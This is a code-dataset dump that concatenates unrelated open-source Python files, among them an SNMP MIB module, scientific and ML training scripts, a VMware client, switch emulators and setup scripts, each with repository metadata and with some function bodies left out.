# VERIFY_SSL controls whether we verify the server's TLS certificate or not
"VERIFY_SSL": False,
# for testing the interaction with the lifecycle management
"ENABLE_ASSESSMENT": True,
# CIMI RESOURCES managed by this component
"CIMI_PROFILES": "user-profile",
"CIMI_SHARING_MODELS": "sharing-model",
"SERVICE_CONSUMER": True,
"RESOURCE_CONTRIBUTOR": True,
"MAX_APPS": 2,
"BATTERY_LIMIT": 50,
"GPS_ALLOWED": True,
"MAX_CPU_USAGE": 50,
"MAX_MEM_USAGE": 50,
"MAX_STO_USAGE": 50,
"MAX_BANDWITH_USAGE": 50,
# URLs / ports from other components:
# LIFECYCLE
"URL_PM_LIFECYCLE": "http://lifecycle:46000/api/v2/lm"
}
# APPS RUNNING
APPS_RUNNING = 0 | 32.714286 | 109 | 0.501698 |
fbe8a390825becc2ff9eab5332457693f2473fbc | 3,606 | py | Python | pysnmp-with-texts/IANA-MALLOC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/IANA-MALLOC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/IANA-MALLOC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module IANA-MALLOC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/IANA-MALLOC-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:50:25 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ConstraintsUnion", "ValueSizeConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Integer32, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, NotificationType, TimeTicks, mib_2, ObjectIdentity, Bits, Counter64, Gauge32, Unsigned32, ModuleIdentity, Counter32, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "NotificationType", "TimeTicks", "mib-2", "ObjectIdentity", "Bits", "Counter64", "Gauge32", "Unsigned32", "ModuleIdentity", "Counter32", "IpAddress")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
ianaMallocMIB = ModuleIdentity((1, 3, 6, 1, 2, 1, 102))
ianaMallocMIB.setRevisions(('2014-05-22 00:00', '2003-01-27 12:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ianaMallocMIB.setRevisionsDescriptions(('Updated contact info.', 'Initial version.',))
if mibBuilder.loadTexts: ianaMallocMIB.setLastUpdated('201405220000Z')
if mibBuilder.loadTexts: ianaMallocMIB.setOrganization('IANA')
if mibBuilder.loadTexts: ianaMallocMIB.setContactInfo(' Internet Assigned Numbers Authority Internet Corporation for Assigned Names and Numbers 12025 Waterfront Drive, Suite 300 Los Angeles, CA 90094-2536 Phone: +1 310-301-5800 EMail: iana&iana.org')
if mibBuilder.loadTexts: ianaMallocMIB.setDescription('This MIB module defines the IANAscopeSource and IANAmallocRangeSource textual conventions for use in MIBs which need to identify ways of learning multicast scope and range information. Any additions or changes to the contents of this MIB module require either publication of an RFC, or Designated Expert Review as defined in the Guidelines for Writing IANA Considerations Section document. The Designated Expert will be selected by the IESG Area Director(s) of the Transport Area.')
mibBuilder.exportSymbols("IANA-MALLOC-MIB", IANAmallocRangeSource=IANAmallocRangeSource, IANAscopeSource=IANAscopeSource, ianaMallocMIB=ianaMallocMIB, PYSNMP_MODULE_ID=ianaMallocMIB)
| 100.166667 | 537 | 0.781475 |
fbe96376f6c7e8ea5a7177b454718260bda00d58 | 112 | py | Python | api/base/views/__init__.py | simpsonw/atmosphere | 3a5203ef0b563de3a0e8c8c8715df88186532d7a | [
"BSD-3-Clause"
] | 197 | 2016-12-08T02:33:32.000Z | 2022-03-23T14:27:47.000Z | api/base/views/__init__.py | simpsonw/atmosphere | 3a5203ef0b563de3a0e8c8c8715df88186532d7a | [
"BSD-3-Clause"
] | 385 | 2017-01-03T22:51:46.000Z | 2020-12-16T16:20:42.000Z | api/base/views/__init__.py | benlazarine/atmosphere | 38fad8e4002e510e8b4294f2bb5bc75e8e1817fa | [
"BSD-3-Clause"
] | 50 | 2016-12-08T08:32:25.000Z | 2021-12-10T00:21:39.000Z | from .version import VersionViewSet, DeployVersionViewSet
__all__ = ["VersionViewSet", "DeployVersionViewSet"]
| 28 | 57 | 0.821429 |
fbed4a160c462e80695d00929515e53d559a44ef | 455 | py | Python | amaranth/vendor/xilinx_spartan_3_6.py | psumesh/nmigen | 7d611b8fc1d9e58853ff268ec38ff8f4131a9774 | [
"BSD-2-Clause"
] | 528 | 2020-01-28T18:21:00.000Z | 2021-12-09T06:27:51.000Z | amaranth/vendor/xilinx_spartan_3_6.py | psumesh/nmigen | 7d611b8fc1d9e58853ff268ec38ff8f4131a9774 | [
"BSD-2-Clause"
] | 360 | 2020-01-28T18:34:30.000Z | 2021-12-10T08:03:32.000Z | amaranth/vendor/xilinx_spartan_3_6.py | psumesh/nmigen | 7d611b8fc1d9e58853ff268ec38ff8f4131a9774 | [
"BSD-2-Clause"
] | 100 | 2020-02-06T21:55:46.000Z | 2021-11-25T19:20:44.000Z | import warnings
from .xilinx import XilinxPlatform
__all__ = ["XilinxSpartan3APlatform", "XilinxSpartan6Platform"]
XilinxSpartan3APlatform = XilinxPlatform
XilinxSpartan6Platform = XilinxPlatform
# TODO(amaranth-0.4): remove
warnings.warn("instead of amaranth.vendor.xilinx_spartan_3_6.XilinxSpartan3APlatform and "
".XilinxSpartan6Platform, use amaranth.vendor.xilinx.XilinxPlatform",
DeprecationWarning, stacklevel=2)
| 26.764706 | 90 | 0.782418 |
fbee0d4e9115c00d9a52094547d27c43033ebffb | 2,968 | py | Python | spatialtis/_plotting/api/community_map.py | Mr-Milk/SpatialTis | bcdc6df5213b8b256cbe4c9a7c0f3b5e6d3c56b6 | [
"Apache-2.0"
] | 10 | 2020-07-14T13:27:35.000Z | 2021-11-24T21:41:30.000Z | spatialtis/_plotting/api/community_map.py | Mr-Milk/SpatialTis | bcdc6df5213b8b256cbe4c9a7c0f3b5e6d3c56b6 | [
"Apache-2.0"
] | 21 | 2021-01-10T09:39:25.000Z | 2022-03-12T01:04:52.000Z | spatialtis/_plotting/api/community_map.py | Mr-Milk/SpatialTis | bcdc6df5213b8b256cbe4c9a7c0f3b5e6d3c56b6 | [
"Apache-2.0"
] | null | null | null | from ast import literal_eval
from collections import Counter
from typing import Dict, Optional
from anndata import AnnData
from spatialtis.config import Config, analysis_list
from ...utils import doc
from ..base import graph_position_interactive, graph_position_static
from .utils import query_df
| 31.242105 | 91 | 0.637466 |
fbef292579d80d2de80ed4ab24cb1a2133c269b6 | 7,209 | py | Python | pynics/binparse/castep_bin_results.py | ThatPerson/pynics | ae9dd58fa4353c4907f6fd7d6ad368029a4288f1 | [
"MIT"
] | 2 | 2019-10-03T21:18:17.000Z | 2019-10-05T13:08:36.000Z | pynics/binparse/castep_bin_results.py | ThatPerson/pynics | ae9dd58fa4353c4907f6fd7d6ad368029a4288f1 | [
"MIT"
] | 2 | 2021-06-25T15:11:27.000Z | 2021-10-04T13:23:04.000Z | pynics/binparse/castep_bin_results.py | ThatPerson/pynics | ae9dd58fa4353c4907f6fd7d6ad368029a4288f1 | [
"MIT"
] | 1 | 2021-06-25T14:32:07.000Z | 2021-06-25T14:32:07.000Z | # Python 2-to-3 compatibility code
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
from pynics.binparse.forbinfile import RecordError
# Utility routine
castep_bin_olist = {
'E_FERMI': opt_e_fermi_parse,
'OEP_POT': opt_oep_pot_parse,
'DE_DLOGE': opt_de_dloge_parse,
'FORCES': opt_forces_parse,
'STRESS': opt_stress_parse,
'SHIELDING': opt_shielding_parse,
'EFG': opt_efg_parse,
}
| 34.826087 | 78 | 0.629768 |
fbef307f38bef0fc49bdcc1050b0a7022b885117 | 1,084 | py | Python | epi-poc-demo/node-b/node-b.py | onnovalkering/epif-poc | 0fac10ce59037fbf8725f09808813dbab71ff70a | [
"Apache-2.0"
] | null | null | null | epi-poc-demo/node-b/node-b.py | onnovalkering/epif-poc | 0fac10ce59037fbf8725f09808813dbab71ff70a | [
"Apache-2.0"
] | null | null | null | epi-poc-demo/node-b/node-b.py | onnovalkering/epif-poc | 0fac10ce59037fbf8725f09808813dbab71ff70a | [
"Apache-2.0"
] | null | null | null | import os
import socket
import threading
HEADER = 64
PORT = 5053
FW = "192.168.101.2"
ADDR = (FW, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
print("[STARTING] server is starting...")
start()
| 23.565217 | 74 | 0.628229 |
fbef8b98b95a0bd508e97ef365acd9e2c1cbd2ce | 652 | py | Python | sliding_window/equal_substring.py | sleebapaul/codeforces | 50c8bff0b36e6ce7e8f89c7c827ae8845f80098e | [
"MIT"
] | null | null | null | sliding_window/equal_substring.py | sleebapaul/codeforces | 50c8bff0b36e6ce7e8f89c7c827ae8845f80098e | [
"MIT"
] | null | null | null | sliding_window/equal_substring.py | sleebapaul/codeforces | 50c8bff0b36e6ce7e8f89c7c827ae8845f80098e | [
"MIT"
] | null | null | null | """
1208. Get Equal Substrings Within Budget
Straight forward. Asked the max len, so count the max each time.
""" | 27.166667 | 72 | 0.518405 |
fbef9d38a58cfa2a1c22c680025cec376e6993bf | 13,836 | py | Python | test/functional/esperanza_withdraw.py | frolosofsky/unit-e | d3d12508b915986841bd19c4dee9e50dd662a112 | [
"MIT"
] | null | null | null | test/functional/esperanza_withdraw.py | frolosofsky/unit-e | d3d12508b915986841bd19c4dee9e50dd662a112 | [
"MIT"
] | null | null | null | test/functional/esperanza_withdraw.py | frolosofsky/unit-e | d3d12508b915986841bd19c4dee9e50dd662a112 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2018-2019 The Unit-e developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import UnitETestFramework
from test_framework.util import (
json,
connect_nodes,
disconnect_nodes,
assert_equal,
assert_finalizationstate,
assert_raises_rpc_error,
sync_blocks,
wait_until,
)
from decimal import Decimal
import time
LOGOUT_DYNASTY_DELAY = 3
WITHDRAW_EPOCH_DELAY = 12
if __name__ == '__main__':
EsperanzaWithdrawTest().main()
| 46.901695 | 113 | 0.568661 |
fbf016290a6953a4fa95305b7831cd89ba6cb242 | 2,213 | py | Python | test/geocoders/placefinder.py | gongso1st/geopy | 9252f4b12197ff3c5e3fae50d9bae74974d5d20f | [
"MIT"
] | 1 | 2019-07-17T14:38:52.000Z | 2019-07-17T14:38:52.000Z | test/geocoders/placefinder.py | gongso1st/geopy | 9252f4b12197ff3c5e3fae50d9bae74974d5d20f | [
"MIT"
] | null | null | null | test/geocoders/placefinder.py | gongso1st/geopy | 9252f4b12197ff3c5e3fae50d9bae74974d5d20f | [
"MIT"
] | 1 | 2021-06-28T01:20:12.000Z | 2021-06-28T01:20:12.000Z |
import unittest
from geopy.compat import u
from geopy.point import Point
from geopy.geocoders import YahooPlaceFinder
from test.geocoders.util import GeocoderTestBase, env
| 28.371795 | 87 | 0.598735 |
fbf1cd1a479f1f30a64fa316deccf90f2fde6080 | 1,151 | py | Python | inetdxmlrpc.py | Leonidas-from-XIV/sandbox | ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50 | [
"WTFPL"
] | null | null | null | inetdxmlrpc.py | Leonidas-from-XIV/sandbox | ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50 | [
"WTFPL"
] | null | null | null | inetdxmlrpc.py | Leonidas-from-XIV/sandbox | ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50 | [
"WTFPL"
] | null | null | null | #!/usr/bin/env python2.4
# -*- encoding: latin-1 -*-
"""A small XML-RPC Server running under control
of the internet superserver inetd.
Configuring:
Add this line to your inetd.conf
embedxmlrpc stream tcp nowait user /usr/sbin/tcpd inetdxmlrpc.py
Where user is the user to execute the script and
inetdxmlprc.py the path to the script.
and this line to your services.conf
embedxmlrpc 7373/tcp # standalone XML-RPC server
there 7373 will be the port
You have to restart your inetd.
"""
import sys, xmlrpclib
funcs = {"sumAndDifference": sumAndDifference}
if __name__ == '__main__':
inetdcall()
| 25.577778 | 77 | 0.645526 |
fbf23a32edea1c76b286e1eb5b7cddd3cfc77494 | 17,504 | py | Python | examples/tensorflow/train/crnn_chinese/code_multi/tools/train_shadownet_multi.py | soar-zhengjian/uai-sdk | e195bd3fb2b97aca7dac6722d332c25b7070481f | [
"Apache-2.0"
] | 38 | 2017-04-26T04:00:09.000Z | 2022-02-10T02:51:05.000Z | examples/tensorflow/train/crnn_chinese/code_multi/tools/train_shadownet_multi.py | soar-zhengjian/uai-sdk | e195bd3fb2b97aca7dac6722d332c25b7070481f | [
"Apache-2.0"
] | 17 | 2017-11-20T20:47:09.000Z | 2022-02-09T23:48:46.000Z | examples/tensorflow/train/crnn_chinese/code_multi/tools/train_shadownet_multi.py | soar-zhengjian/uai-sdk | e195bd3fb2b97aca7dac6722d332c25b7070481f | [
"Apache-2.0"
] | 28 | 2017-07-08T05:23:13.000Z | 2020-08-18T03:12:27.000Z | """
Train shadow net script
"""
import argparse
import functools
import itertools
import os
import os.path as ops
import sys
import time
import numpy as np
import tensorflow as tf
import pprint
import shadownet
import six
from six.moves import xrange # pylint: disable=redefined-builtin
sys.path.append('/data/')
from crnn_model import crnn_model
from local_utils import data_utils, log_utils, tensorboard_vis_summary
from global_configuration import config
from uaitrain.arch.tensorflow import uflag
from typing import List
from tensorflow.core.framework import node_def_pb2
from tensorflow.python.framework import device as pydev
from tensorflow.python.training import device_setter
tf.app.flags.DEFINE_string('dataset_dir','/data/data/tfrecords','data path')
tf.app.flags.DEFINE_string('weights_path',None,'weight path')
FLAGS = tf.app.flags.FLAGS
logger = log_utils.init_logger()
def get_shadownet_fn(num_gpus, variable_strategy, num_workers):
"""Returns a function that will build shadownet model."""
return _shadownet_fun
def input_fn(data_dir,
             subset,
             num_shards,
             batch_size,
             use_distortion_for_training=True):
  """Build the sharded input pipeline for the model.

  Args:
    data_dir: directory holding the TFRecords for the dataset.
    subset: one of 'train', 'validate' and 'eval'.
    num_shards: number of data-parallel towers; values below 1 are treated
      as a single shard (no GPU / single-GPU case).
    batch_size: total batch size, divided across the shards.
    use_distortion_for_training: True to distort training images.

  Returns:
    A pair (feature_shards, label_shards) of per-tower inputs.
  """
  with tf.device('/cpu:0'):
    # Distortions only apply to the training subset, and only when enabled.
    distort = subset == 'train' and use_distortion_for_training
    dataset = shadownet.ShadownetDataSet(data_dir, subset, distort)
    images, labels = dataset.make_batch(batch_size)
    # No GPU available or only 1 GPU: fall back to a single shard.
    shard_count = max(num_shards, 1)
    feature_shards = tf.split(images, shard_count)
    label_shards = tf.sparse_split(sp_input=labels, num_split=shard_count, axis=0)
    return feature_shards, label_shards
if __name__ == '__main__':
# init args
# args = init_args()
#if not ops.exists(args.dataset_dir):
# raise ValueError('{:s} doesn\'t exist'.format(args.dataset_dir))
#train_shadownet(args.dataset_dir, args.weights_path)
# if args.weights_path is not None and 'two_stage' in args.weights_path:
# train_shadownet(args.dataset_dir, args.weights_path, restore_from_cnn_subnet_work=False)
# elif args.weights_path is not None and 'cnnsub' in args.weights_path:
# train_shadownet(args.dataset_dir, args.weights_path, restore_from_cnn_subnet_work=True)
# else:
# train_shadownet(args.dataset_dir)
parser = argparse.ArgumentParser()
parser.add_argument(
'--num_gpus',
type=int,
default=1,
help='UAI-SDK related. The number of gpus used.')
parser.add_argument(
'--log-device-placement',
action='store_true',
default=False,
help='Whether to log device placement.')
parser.add_argument(
'--num-intra-threads',
type=int,
default=0,
help="""\
Number of threads to use for intra-op parallelism. When training on CPU
set to 0 to have the system pick the appropriate number or alternatively
set it to the number of physical CPU cores.\
""")
parser.add_argument(
'--num-inter-threads',
type=int,
default=0,
help="""\
Number of threads to use for inter-op parallelism. If set to 0, the
system will pick an appropriate number.\
""")
parser.add_argument(
'--sync',
action='store_true',
default=False,
help="""\
If present when running in a distributed environment will run on sync mode.\
""")
parser.add_argument(
'--work_dir',
type=str,
default='/data/',
help='UAI SDK related.')
parser.add_argument(
'--data_dir',
type=str,
required=True,
help='UAI-SDK related. The directory where the CIFAR-10 input data is stored.')
parser.add_argument(
'--output_dir',
type=str,
required=True,
help='UAI-SDK related. The directory where the model will be stored.')
parser.add_argument(
'--log_dir',
type=str,
default='/data/data/',
help='UAI SDK related.')
parser.add_argument(
'--l_size',
type=int,
default=10,
help="""l_batch_label, how many labels CNN net work will output into LSTM""")
parser.add_argument(
'--learning_rate',
type=float,
default=0.1)
parser.add_argument(
'--decay_rate',
type=float,
default=0.1)
parser.add_argument(
'--decay_steps',
type=int,
default=40000)
parser.add_argument(
'--steps',
type=int,
default=200000)
parser.add_argument(
'--batch_size',
type=int,
default=512)
parser.add_argument(
'--tfrecord_dir',
type=str,
default='tfrecords')
args = parser.parse_args()
main(**vars(args))
print('Done') | 40.424942 | 159 | 0.584324 |
fbf29fa665c3f19650fb43d520ce03961090f743 | 7,007 | py | Python | ovs/extensions/hypervisor/hypervisors/vmware.py | mflu/openvstorage_centos | 280a98d3e5d212d58297e0ffcecd325dfecef0f8 | [
"Apache-2.0"
] | 1 | 2015-08-29T16:36:40.000Z | 2015-08-29T16:36:40.000Z | ovs/extensions/hypervisor/hypervisors/vmware.py | rootfs-analytics/openvstorage | 6184822340faea1d2927643330a7aaa781d92d36 | [
"Apache-2.0"
] | null | null | null | ovs/extensions/hypervisor/hypervisors/vmware.py | rootfs-analytics/openvstorage | 6184822340faea1d2927643330a7aaa781d92d36 | [
"Apache-2.0"
] | null | null | null | # Copyright 2014 CloudFounders NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module for the VMware hypervisor client
"""
import os
from ovs.extensions.hypervisor.apis.vmware.sdk import Sdk
| 34.860697 | 123 | 0.628942 |
fbf2ccc900304e6fa6940b6cc3e4418b5177231a | 6,314 | py | Python | fake_switches/dell10g/command_processor/config_interface.py | idjaw/fake-switches | 9b481e17a26cca24bf3ef44466feebf9bff794f8 | [
"Apache-2.0"
] | null | null | null | fake_switches/dell10g/command_processor/config_interface.py | idjaw/fake-switches | 9b481e17a26cca24bf3ef44466feebf9bff794f8 | [
"Apache-2.0"
] | 1 | 2022-02-11T03:49:01.000Z | 2022-02-11T03:49:01.000Z | fake_switches/dell10g/command_processor/config_interface.py | idjaw/fake-switches | 9b481e17a26cca24bf3ef44466feebf9bff794f8 | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 Internap.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from fake_switches.dell.command_processor.config_interface import DellConfigInterfaceCommandProcessor, parse_vlan_list
from fake_switches.switch_configuration import AggregatedPort
| 46.77037 | 119 | 0.548939 |
fbf2e31cb815224097d8066fca9f33447d38f065 | 939 | py | Python | setup.py | Spredzy/python-memsource | 9624a1e93dab9cec874164fb390432c51ab0de31 | [
"Apache-2.0"
] | null | null | null | setup.py | Spredzy/python-memsource | 9624a1e93dab9cec874164fb390432c51ab0de31 | [
"Apache-2.0"
] | null | null | null | setup.py | Spredzy/python-memsource | 9624a1e93dab9cec874164fb390432c51ab0de31 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import setuptools
from memsource import version
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="memsource",
version=version.__version__,
author="Yanis Guenane",
author_email="yguenane+opensource@gmail.com",
description="Python bindings for Memsource",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Spredzy/python-memsource",
packages=setuptools.find_packages(),
install_requires=[
"requests"
],
classifiers=[
"Programming Language :: Python :: 3",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Information Technology",
"License :: OSI Approved :: Apache Software License",
"Operating System :: POSIX :: Linux",
],
python_requires=">=3.6",
)
| 27.617647 | 61 | 0.664537 |
fbf375a6746c12699f7672902496fe49ba8773ae | 5,637 | py | Python | sktime/transformations/series/func_transform.py | marcio55afr/sktime | 25ba2f470f037366ca6b0e529137d3d0a6191e2e | [
"BSD-3-Clause"
] | 2 | 2021-12-28T10:48:11.000Z | 2022-03-06T18:08:01.000Z | sktime/transformations/series/func_transform.py | marcio55afr/sktime | 25ba2f470f037366ca6b0e529137d3d0a6191e2e | [
"BSD-3-Clause"
] | 2 | 2021-04-19T17:38:33.000Z | 2021-07-25T18:44:10.000Z | sktime/transformations/series/func_transform.py | marcio55afr/sktime | 25ba2f470f037366ca6b0e529137d3d0a6191e2e | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3 -u
# -*- coding: utf-8 -*-
"""Implements FunctionTransformer, a class to create custom transformers."""
__author__ = ["Bouke Postma"]
__all__ = ["FunctionTransformer"]
import numpy as np
from sktime.transformations.base import _SeriesToSeriesTransformer
from sktime.utils.validation.series import check_series
def _identity(X):
    """Identity transform: return the input ``X`` unchanged.

    Used as a no-op callable where a transform function is required but no
    transformation should be applied.
    """
    return X
| 33.553571 | 88 | 0.631896 |
fbf4288218731b27d1646ee39344ec7cc83f8d4a | 13,963 | py | Python | regparser/tree/xml_parser/reg_text.py | cfpb/regulations-parser | 9b6e1ab2dbec93a915eb6da9a2d88c723b9ac424 | [
"CC0-1.0"
] | 36 | 2015-01-05T21:17:36.000Z | 2020-04-28T21:02:55.000Z | regparser/tree/xml_parser/reg_text.py | DalavanCloud/regulations-parser | 9b6e1ab2dbec93a915eb6da9a2d88c723b9ac424 | [
"CC0-1.0"
] | 49 | 2015-01-28T15:54:25.000Z | 2018-08-20T20:20:08.000Z | regparser/tree/xml_parser/reg_text.py | DalavanCloud/regulations-parser | 9b6e1ab2dbec93a915eb6da9a2d88c723b9ac424 | [
"CC0-1.0"
] | 23 | 2015-01-28T15:34:18.000Z | 2021-02-20T10:53:34.000Z | # vim: set encoding=utf-8
import re
from lxml import etree
import logging
from regparser import content
from regparser.tree.depth import heuristics, rules, markers as mtypes
from regparser.tree.depth.derive import derive_depths
from regparser.tree.struct import Node
from regparser.tree.paragraph import p_level_of
from regparser.tree.xml_parser.appendices import build_non_reg_text
from regparser.tree import reg_text
from regparser.tree.xml_parser import tree_utils
from settings import PARAGRAPH_HIERARCHY
def get_reg_part(reg_doc):
    """Locate the CFR part number for this document.

    Different XML sources store the part number in different places; collect
    every candidate in source-priority order and return the first one that is
    not blank (None when no source yields a part number).
    """
    candidates = []
    # FR notice
    for node in reg_doc.xpath('//REGTEXT'):
        candidates.append(node.attrib['PART'])
    # e-CFR XML, under PART/EAR
    for node in reg_doc.xpath('//PART/EAR'):
        if 'Pt.' in node.text:
            candidates.append(node.text.replace('Pt.', '').strip())
    # e-CFR XML, under FDSYS/HEADING
    for node in reg_doc.xpath('//FDSYS/HEADING'):
        if 'PART' in node.text:
            candidates.append(node.text.replace('PART', '').strip())
    # e-CFR XML, under FDSYS/GRANULENUM
    for node in reg_doc.xpath('//FDSYS/GRANULENUM'):
        candidates.append(node.text.strip())

    # First candidate with non-whitespace content wins; note the candidate is
    # returned as collected (not re-stripped), matching historical behavior.
    for part in candidates:
        if part.strip():
            return part
    return None
def get_title(reg_doc):
    """Return the regulation's title, read from the first PART/HD heading."""
    return reg_doc.xpath('//PART/HD')[0].text
def preprocess_xml(xml):
    """This transforms the read XML through macros. Each macro consists of
    an xpath and a replacement xml string"""
    for path, replacement in content.Macros():
        # Parse the replacement snippet once per macro; the wrapping <ROOT>
        # element lets a macro expand into multiple sibling elements.
        replacement = etree.fromstring('<ROOT>' + replacement + '</ROOT>')
        for node in xml.xpath(path):
            parent = node.getparent()
            idx = parent.index(node)
            parent.remove(node)
            # Splice the replacement's children in at the removed node's
            # position, preserving their order.
            # NOTE(review): lxml *moves* an element when inserting it under a
            # new parent, so if the xpath matches several nodes the same
            # replacement elements migrate to the last match, and the loop
            # below iterates a collection it is emptying — confirm whether
            # multi-match macros are intended/used before relying on this.
            for repl in replacement:
                parent.insert(idx, repl)
                idx += 1
# @profile
def get_markers(text):
    """Extract every paragraph marker found in ``text``.

    Collapsed markers are sanity-checked: one is kept only when it can sit
    at least one level deeper than the last ordinary (initial) marker.
    """
    markers = tree_utils.get_paragraph_markers(text)
    collapsed = tree_utils.get_collapsed_markers(text)

    # A collapsed marker only makes sense if it nests below the last initial
    # marker; discard any that cannot.
    if markers and collapsed:
        top_levels = p_level_of(markers[-1])
        collapsed = [
            marker for marker in collapsed
            if any(level > top
                   for top in top_levels
                   for level in p_level_of(marker))
        ]

    return list(markers) + list(collapsed)
def next_marker(xml_node, remaining_markers):
    """Determine the marker that follows the current ``xml_node``.

    ``remaining_markers`` lists markers still pending *within* the node and
    takes priority; otherwise the next sibling's first marker is used.
    May return None.
    """
    # Markers still queued inside this node win.
    if remaining_markers:
        return remaining_markers[0][0]

    # Otherwise peek at the next sibling, skipping star/page-break nodes.
    sib = xml_node.getnext()
    while sib is not None and sib.tag in ('STARS', 'PRTPAGE'):
        sib = sib.getnext()
    if sib is None:
        return None

    sib_markers = get_markers(tree_utils.get_node_text(sib))
    return sib_markers[0] if sib_markers else None
| 37.840108 | 78 | 0.587911 |
fbf49444e0f4679af981bbaa8faf8266920ca318 | 1,216 | py | Python | setup.py | mark-dawn/stytra | be1d5be0a44aeb685d475240d056ef7adf60ed06 | [
"MIT"
] | null | null | null | setup.py | mark-dawn/stytra | be1d5be0a44aeb685d475240d056ef7adf60ed06 | [
"MIT"
] | null | null | null | setup.py | mark-dawn/stytra | be1d5be0a44aeb685d475240d056ef7adf60ed06 | [
"MIT"
] | null | null | null | from distutils.core import setup
from setuptools import find_packages
setup(
name="stytra",
version="0.1",
author="Vilim Stih, Luigi Petrucco @portugueslab",
author_email="vilim@neuro.mpg.de",
license="MIT",
packages=find_packages(),
install_requires=[
"pyqtgraph>=0.10.0",
"numpy",
"numba",
"matplotlib",
"pandas",
"qdarkstyle",
"qimage2ndarray",
"deepdish",
"param",
"pims",
"GitPython",
"pymongo",
"colorspacious",
"arrayqueues",
],
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
# Pick your license as you wish (should match "license" above)
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
],
keywords="tracking processing",
description="A modular package to control stimulation and track behaviour in zebrafish experiments.",
project_urls={
"Source": "https://github.com/portugueslab/stytra",
"Tracker": "https://github.com/portugueslab/stytra/issues",
},
)
| 28.27907 | 105 | 0.591283 |
fbf4c0c322e799620006a7ec56b567282c3ba0ca | 226 | py | Python | checkTicTacToe/checkTicTacToe.py | nate-ar-williams/coding-questions | 24baa901a786e6e2c4e8ea823a26416bc51e1f6a | [
"MIT"
] | null | null | null | checkTicTacToe/checkTicTacToe.py | nate-ar-williams/coding-questions | 24baa901a786e6e2c4e8ea823a26416bc51e1f6a | [
"MIT"
] | null | null | null | checkTicTacToe/checkTicTacToe.py | nate-ar-williams/coding-questions | 24baa901a786e6e2c4e8ea823a26416bc51e1f6a | [
"MIT"
] | null | null | null | #!/usr/bin/python3
# let board be 3x3 bool array
# Script entry point.  NOTE(review): `main` is not defined anywhere in
# this excerpt -- confirm the full file provides it.
if __name__ == '__main__':
    main()
| 12.555556 | 32 | 0.588496 |
fbf52c7f3a9bab66d56f2bccbaf8974ecb5420d3 | 2,138 | py | Python | openerp/exceptions.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | 3 | 2016-01-29T14:39:49.000Z | 2018-12-29T22:42:00.000Z | openerp/exceptions.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
